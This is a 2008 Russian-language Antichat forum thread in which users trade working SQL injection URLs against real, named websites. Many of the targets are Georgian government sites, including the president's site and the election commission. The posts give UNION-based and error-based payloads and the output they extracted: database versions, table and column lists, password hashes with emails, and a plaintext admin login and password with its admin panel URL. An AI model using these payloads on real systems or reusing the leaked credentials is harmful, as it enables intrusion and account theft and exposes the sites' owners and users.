ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6251  
Старый 10.08.2008, 00:32
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039

Репутация: 1160
Отправить сообщение для DDoSька с помощью ICQ
По умолчанию

Qwazar,сорри,я просто,не увидел,Что ты хэшик вытащил...АА...я первее хэш вытащил))
Цитата:
Сообщение от Qwazar  
http://presa.ge/index.php?text=archive&date=-11+union+select+1,2,table_name,4,5,6+from+informat ion_schema.tables--

user: presa_ge@localhost
dbname: presa_ge
version: 5.0.51
TAbles:
Цитата:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
menu_tree
news
page_types
user_group
users
--id
--user_username
--user_password
--user_firstname
--user_lastname
--user_email
--user_group
Цитата:
http://presa.ge/index.php?text=archive&date=-11+union+select+1,2,column_name,4,5,6+from+informa tion_schema.columns+where+table_name=0x7573657273--
presa.ge:c1ab283404b71a940807009023a764bd:xx@XX.xx
******************************************
abs-tech.com
Цитата:
SQL-injection
http://www.abs-tech.com/produto.php?id_produto=376+union+select+1,2,3,4,5, 6
Цитата:
http://www.abs-tech.com/produto.php?id_produto=376+union+select+1,concat_w s(0x3a,version(),user()),3,4,5,6
Version:5.0.51-locaweb-log
User:abs_tech1@200.234.200.132
Цитата:
http://www.abs-tech.com/produto.php?id_produto=376+union+select+1,table_na me,3,4,5,6+from+information_schema.tables
Tables:
tb_fornecedores
tb_mais_informacoes
tb_noticias_arquivos
tb_tickers
tb_downloads
tb_links
tb_noticias
tb_produtos
tb_institucional
tb_menu
tb_novidades
tb_usuario
--email
--nivel
--id_usuario
--senha
--nome
Цитата:
http://www.abs-tech.com/produto.php?id_produto=376+union+select+1,concat_w s(0x3a,id_usuario,email,nivel,senha,nome),3,4,5,6+ from+tb_usuario
1:w3:1:radum123:W3 Criações
http://www.abs-tech.com/admin/
login:w3
password:radium123
Но я там оказался не одним из первых:

Последний раз редактировалось DDoSька; 10.08.2008 в 02:01..
 
Ответить с цитированием

  #6252  
Старый 10.08.2008, 02:33
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию

Код:
_http://politics.internet.ge/stat_relatives.html?date=2008-08-09+99999&stat=13+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12,13/*
смело ковыряем)
 
Ответить с цитированием

  #6253  
Старый 10.08.2008, 02:37
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065

Репутация: 869
По умолчанию

Код:
http://www.hereandnow.ru/index.php?ids=1%20UNION%20SELECT%201,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7%20LIMIT%201,1/*
Цитата:
4.1.22:hereandnow:hereandnow@localhost
 
Ответить с цитированием

  #6254  
Старый 10.08.2008, 02:59
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039

Репутация: 1160
Отправить сообщение для DDoSька с помощью ICQ
По умолчанию

Цитата:
Сообщение от DimOnOID  
Код:
_http://politics.internet.ge/stat_relatives.html?date=2008-08-09+99999&stat=13+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12,13/*
смело ковыряем)
много таблиу от PhpBB ,но нету доступа к таблицы phpbb_users
 
Ответить с цитированием

  #6255  
Старый 10.08.2008, 03:11
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию

Цитата:
Сообщение от DDoSька  
много таблиу от PhpBB ,но нету доступа к таблицы phpbb_users
Код:
http://politics.internet.ge/stat_relatives.html?date=2008-08-09+99999&stat=13+union+select+1,2,3,4,user_id,6,7,8,9,10,11,12,13+from+forum.phpbb_users/*
Как выяснилось позже..это приватный форум
forum.
sanet
.ge
туда доступа нету(

Последний раз редактировалось DimOnOID; 10.08.2008 в 03:14..
 
Ответить с цитированием

  #6256  
Старый 10.08.2008, 03:15
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию

Код:
http://www.results.cec.gov.ge/major_olq.php?district=1%20or%201=@@version--
в MSSQL Не силён((
 
Ответить с цитированием

  #6257  
Старый 10.08.2008, 03:23
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

Цитата:
Сообщение от DimOnOID  
Код:
http://politics.internet.ge/stat_relatives.html?date=2008-08-09+99999&stat=13+union+select+1,2,3,4,user_id,6,7,8,9,10,11,12,13+from+forum.phpbb_users/*
Как выяснилось позже..это приватный форум
forum.
sanet
.ge
туда доступа нету(
///

Цитата:
http://politics.internet.ge/stat_relatives.html?date=2008-08-09+99999&stat=-1+union+select+1,2,3,4,concat_ws(0x3a,username,use r_password),6,7,8,9,10,11,12,13+from+forum.phpbb_u sers+limit+2,1/*
Цитата:
http://politics.internet.ge/stat_relatives.html?date=2008-08-09+99999&stat=-1+union+select+1,2,3,4,concat_ws(0x3a,username,pas sword),6,7,8,9,10,11,12,13+from+stat.users/*

Последний раз редактировалось ~!DoK_tOR!~; 10.08.2008 в 03:25..
 
Ответить с цитированием

  #6258  
Старый 10.08.2008, 03:29
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

Цитата:
Сообщение от DimOnOID  
Код:
http://www.results.cec.gov.ge/major_olq.php?district=1%20or%201=@@version--
в MSSQL Не силён((
Цитата:
http://www.results.cec.gov.ge/major_olq.php?district=1%20or%201=(SELECT+TOP+1+TA BLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
кодировка ппц )
 
Ответить с цитированием

  #6259  
Старый 10.08.2008, 12:02
dr.Pilulkin
Познающий
Регистрация: 03.06.2007
Сообщений: 44
Провел на форуме:
418827

Репутация: 48
По умолчанию

http://www.adjara.gov.ge/eng/index.php?page=show&id=-919+union+select+1,2,3,version()--
 
Ответить с цитированием

  #6260  
Старый 10.08.2008, 12:47
$p01nt
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме:
584540

Репутация: 96
По умолчанию

www.president.gov.ge


http://www.president.gov.ge/index.php?l=G&m=0&sm=3&id=2693+union+select+1,2,3, 4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0/*
5.0.22-log
president_gov_ge


В таблице юзерс только один логин/пароль
nino:fe3af9dcad7c5f65ae0e8a19ba6cb1f0(ni654)

Админка: http://www.president.gov.ge/admin.php, но ацес дейнед-видимо лок по ип
kolkhida.ge
http://www.kolkhida.ge/rus/view_gancx.php?id=-7%27+union+select+1,2,3,4,5,6,7,8,9/*
4.1.20
test


www.museum.ge
http://www.museum.ge/web_page/index.php?id=-40+union+select+1,2,3,4,5,6,7,8,9
4.1.22-standard-log
museumg_zaza

Последний раз редактировалось $p01nt; 10.08.2008 в 13:08..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ